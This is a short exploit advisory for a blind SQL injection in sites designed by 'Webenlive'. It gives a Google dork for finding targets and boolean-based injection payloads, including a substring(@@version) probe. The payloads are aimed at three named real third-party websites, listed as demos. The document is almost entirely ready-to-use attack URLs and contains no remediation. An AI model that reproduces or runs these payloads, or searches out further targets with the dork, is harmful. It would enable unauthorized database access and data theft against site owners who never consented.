*********************************************************
#Exploit Title: Webenlive - Blind Sql Injection
#Date: 2024-03-15
#Exploit Author: Behrouz Mansoori
#Google Dork: "Design: Webenlive"
#Category:webapps
#Tested On: Mac, Firefox
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://idealenglishschool.in/activity-details.php?id=1%27%20and%20true--+
* https://idealenglishschool.in/activity-details.php?id=1%27%20and%20false--+
* https://idealenglishschool.in/activity-details.php?id=1%27%20and%20substring(@@version,1,1)=8--+
### Demo 2:
* https://aneeshjamesforextuitionsacademy.in/course-details.php?id=8%27%20and%20true--+
* https://aneeshjamesforextuitionsacademy.in/course-details.php?id=8%27%20and%20false--+
* https://aneeshjamesforextuitionsacademy.in/course-details.php?id=8%27%20and%20substring(@@version,1,1)=8--+
### Demo 3:
* https://berentqatar.com/single-product.php?id=34%27%20and%20true--+
* https://berentqatar.com/single-product.php?id=34%27%20and%20false--+
* https://berentqatar.com/single-product.php?id=34%27%20and%20substring(@@version,1,1)=8--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************